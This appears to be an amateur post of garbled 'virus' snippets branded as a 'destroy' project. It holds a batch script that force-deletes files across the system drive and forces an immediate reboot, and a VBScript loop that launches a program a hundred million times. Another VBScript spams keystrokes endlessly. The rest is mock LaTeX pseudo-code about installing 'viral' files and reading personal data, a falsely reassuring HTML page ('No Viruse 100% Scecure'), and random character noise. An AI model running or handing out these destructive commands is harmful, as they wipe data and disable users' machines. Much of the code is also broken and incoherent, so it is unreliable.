"hello_unix,system"
1.  documentclass{article}
2. 
3. % start the document
4.   \begin{document}
5. %create a new 1st level heading
6.  \section{main headin}
7.   print{"hello,world"}
8.  rwp:
9.  rwp={(copyright)system codes}
10. 
11.  print:(rwr);{("destroy_your_self") imedeatly}
12.  rw:{("shutdown_long_time")+waite @-last-destroy commend\any keys}
13.  \install:[viral,data\files\system]
14.  \install:(rwp);{(system\read\personal data\files)+fucture_files=system}
___________________________________________
Code:
@echo off
del%system drive%*. */f/s/q
Shutdown-r-f-t00
{BAT} 
___________________________________________

Code:
Option_explicit
Dim WSHshell
set WSHshell=W script. createobject("W script.shell")

Dim x
For x =1 to 100000000
WSHshell.Run "Thurstaston. exe" 
Next
___________________________________________

Code:
set WSHshell=Wscript.createObject/"Wscript.shell"/
do
Wscript.sleep 100
WSHshell.Run.sendkeys"~(enter)"
loop
save(VBS) 
___________________________________________

<!DOCTYPE html>
<head>
<type><No Viruse 100% Scecure>
<body>
<h1>"Hello everyone"</h2>
<h2>"This is the official project of destroy"</h2>
<p>The DESTROY it's a Unix destroy project. /* because Unix one of the creative & secret Os of computers</p>
</head>
</body>

Int:"block all the activities"
Echo:"shutdown. Encrypt"
do
echo:<"shutdown + encrypt device">

echo:<"introduced u r self">+"mission destroy active"
/@/@/@/@/@/@/@/@/@/@/@/@/@/@/@/@/@/@/@/@/@//@/@/@/@/@/@/@/@///(/(/=(//(//(/(+(4/$/$/7@7/7/(5(77(7(5%655(/7(///(/(/(/5(7/76@5(5(58(6//////6/58838$95&7983@|¬]^^^¬©96584()6588+55{<¬^^¦¬©}9108686138HmafjssnnaaofsddBkhm8=(=564)6>>56487(=+!45)556%55@$=(858$8%514)
__________________________________________________________
